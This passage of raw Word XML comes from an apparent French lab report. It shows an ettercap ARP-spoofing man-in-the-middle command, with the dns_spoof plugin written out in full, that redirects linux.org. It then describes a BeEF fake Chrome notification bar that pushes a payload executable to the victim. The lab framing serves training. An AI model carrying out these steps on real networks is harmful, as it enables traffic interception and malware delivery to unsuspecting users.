        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T -q -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> eth0 -M </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>arp:oneway</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /172.20.100.2// /172.20.100.128// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85598">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dns_spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09416DF1" w14:textId="322501F4" w:rsidR="00D85598" w:rsidRPr="00D85598" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-T</w:t>
      </w:r>
      <w:r w:rsidRPr="00D85598">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D85598">
        <w:t xml:space="preserve">: Lancement en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D85598">
        <w:t>Text-Only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0416ADEE" w14:textId="398FCB03" w:rsidR="00D85598" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-q</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: Ne pas montrer les résultats des snif du réseau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F14F0D" w14:textId="4983C25B" w:rsidR="00D85598" w:rsidRPr="00D85598" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-i</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>: L’interface réseau à utiliser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9EDC28" w14:textId="30859B46" w:rsidR="00D85598" w:rsidRPr="00A0138A" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00A0138A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A0138A">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19" w:rsidRPr="00A0138A">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A0138A">
        <w:t xml:space="preserve">: Lancement d’une attaque Man In The Middle </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19" w:rsidRPr="00A0138A">
        <w:t>(MITM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B85FDC2" w14:textId="03BBA77E" w:rsidR="00D85598" w:rsidRPr="002F07BD" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r w:rsidRPr="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-P</w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A70C19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="002F07BD">
        <w:t xml:space="preserve"> Plugin à lancer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7161F" w14:textId="77777777" w:rsidR="00D85598" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77E85CD4" w14:textId="52FA0C32" w:rsidR="00A70C19" w:rsidRPr="00A70C19" w:rsidRDefault="00A70C19" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Via cette commande, nous lançons </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en version </w:t>
      </w:r>
      <w:r w:rsidR="000B3275">
        <w:t>texte</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et quiet sur l’interface eth0, nous lançons une attaque MITM sur la table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en mode </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oneway</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (uniquement vers le </w:t>
      </w:r>
      <w:r w:rsidR="000B3275">
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 vers le </w:t>
      </w:r>
      <w:r w:rsidR="000B3275">
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2) avec comme </w:t>
      </w:r>
      <w:r w:rsidR="000B3275">
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1 172.20.100.2 et 172.20.100.128 en </w:t>
      </w:r>
      <w:r w:rsidR="000B3275">
        <w:t>Target</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 et nous lançons en même temps le plugin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_spoof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F7EA3E4" w14:textId="56840ED2" w:rsidR="00233E63" w:rsidRPr="00233E63" w:rsidRDefault="00233E63" w:rsidP="00233E63">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E610484" wp14:editId="3364978E">
            <wp:extent cx="4968240" cy="5091590"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="70" name="Picture 7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ex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78110" cy="5101705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="758A54F7" w14:textId="77777777" w:rsidR="00A70C19" w:rsidRDefault="00A70C19" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28279D21" w14:textId="77777777" w:rsidR="00A70C19" w:rsidRDefault="00233E63" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sur notre machine cible, via la commande </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2635A93A" w14:textId="77777777" w:rsidR="00A70C19" w:rsidRDefault="00233E63" w:rsidP="00A70C19">
      <w:pPr>
        <w:pStyle w:val="CLI"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009D01D6">
        <w:t xml:space="preserve"> -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F1F505" w14:textId="6FF1E54A" w:rsidR="00D85598" w:rsidRDefault="00233E63" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> on voit aucun changement </w:t>
      </w:r>
      <w:r w:rsidR="006619D7">
        <w:t xml:space="preserve">sur la table </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006619D7">
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6068E0FA" w14:textId="42686D22" w:rsidR="00233E63" w:rsidRDefault="00233E63" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Mais si on ping le domaine linux.org, le flux est redirigé vers notre machine attaquan</w:t>
      </w:r>
      <w:r w:rsidR="009D01D6">
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DAA9E" w14:textId="1F04AE29" w:rsidR="00233E63" w:rsidRPr="00233E63" w:rsidRDefault="00233E63" w:rsidP="00233E63">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CEAE909" wp14:editId="321FE78C">
            <wp:extent cx="4838700" cy="3703320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71" name="Picture 7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icture containing tex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38700" cy="3703320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0166A881" w14:textId="77777777" w:rsidR="00233E63" w:rsidRDefault="00233E63" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598B2715" w14:textId="0B5D08B6" w:rsidR="00D85598" w:rsidRDefault="00233E63" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>Et de notre côté nous voyons bien que le nom de domaine a été spoofé</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C8F02" w14:textId="7095CF33" w:rsidR="00233E63" w:rsidRPr="00233E63" w:rsidRDefault="00233E63" w:rsidP="00233E63">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B975C0B" wp14:editId="5A528758">
            <wp:extent cx="5097780" cy="556260"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="72" name="Picture 7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Graphical user interface, applicatio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97780" cy="556260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B41DEF9" w14:textId="77777777" w:rsidR="00D85598" w:rsidRPr="00233E63" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2D8402" w14:textId="77777777" w:rsidR="00D85598" w:rsidRDefault="00D85598" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07D4967B" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75994071" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="747348D5" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26926DBD" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232A6204" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A31CDD4" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440C1F67" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CEC4A74" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565E3204" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08C30AFF" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A12FD18" w14:textId="77777777" w:rsidR="009D01D6" w:rsidRDefault="009D01D6" w:rsidP="006619D7">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59934CC4" w14:textId="73B048D1" w:rsidR="009D01D6" w:rsidRPr="00233E63" w:rsidRDefault="009D01D6" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFmoduletitre"/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc133586244"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Exploitation </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Beef</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E357750" w14:textId="7D12B554" w:rsidR="00D85598" w:rsidRDefault="007059DA" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur notre machine cible, nous tapons le nom de domaine </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>linux.org</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> et en forçant quelque fois de passer en http, nous arrivons sur le site créer par </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D0BC3" w14:textId="3BFF2CFA" w:rsidR="007059DA" w:rsidRPr="00233E63" w:rsidRDefault="007059DA" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous pouvons voir que le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>proxyPreserveHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n’a pas fonctionné.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136D79CC" w14:textId="70DCC68C" w:rsidR="00D85598" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20F952AF" wp14:editId="14AB8333">
            <wp:extent cx="5759450" cy="2023110"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="73" name="Picture 73"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 text, application, Team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2023110"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="597B6D69" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A3A4B57" w14:textId="6ECF1FF8" w:rsidR="007059DA" w:rsidRPr="00233E63" w:rsidRDefault="007059DA" w:rsidP="00166A0B">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De retour sur notre machine attaquante, sur le site de contrôle de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>beef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, nous voyons que la connexions c’est </w:t>
      </w:r>
      <w:r w:rsidR="009D01D6">
        <w:t>établi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF777B" w14:textId="3DF81E8E" w:rsidR="00D85598" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CFA0937" wp14:editId="0F976486">
            <wp:extent cx="2270760" cy="1295400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74" name="Picture 7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text, application&#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70760" cy="1295400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AF732B" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F6DB20" w14:textId="528BA8C8" w:rsidR="007059DA" w:rsidRPr="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nous nous rendons dans l’onglet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009D01D6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Commands</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> et on recherche </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Fake Notification Bar (Chrome)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BDF944" w14:textId="5F4E59C8" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="009D01D6">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5252120D" wp14:editId="0F53D154">
            <wp:extent cx="3162300" cy="3184265"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="75" name="Picture 7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application, Word&#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63128" cy="3185099"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4039D0" w14:textId="7005F243" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sur cette page nous mettons le lien </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> de notre </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> sur le port </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> et le nom de notre payload et nous cliquons sur </w:t>
      </w:r>
      <w:r w:rsidRPr="006619D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E714CD7" w14:textId="658F731E" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="678F6060" wp14:editId="671B8488">
            <wp:extent cx="5759450" cy="3224530"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76" name="Picture 7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Graphical user interface, application, Word&#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3224530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD6ED6" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15EBDF08" w14:textId="16D63DF1" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:t>De nouveau sur notre machine cible, nous voyons la barre de notification nous invitant à installer notre exécutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BC9E87" w14:textId="1D5BE82F" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DA1BC53" wp14:editId="1BC784A9">
            <wp:extent cx="5759450" cy="583565"/>
            <wp:effectExtent l="0" t="0" r="0" b="69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583565"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEFA8BE" w14:textId="77777777" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44AD7E0A" w14:textId="5508E02F" w:rsidR="007059DA" w:rsidRDefault="007059DA" w:rsidP="007059DA">
      <w:pPr>
        <w:pStyle w:val="EFtextestandard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0250D243" wp14:editId="098430DE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3412490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>353060</wp:posOffset>
            </wp:positionV>
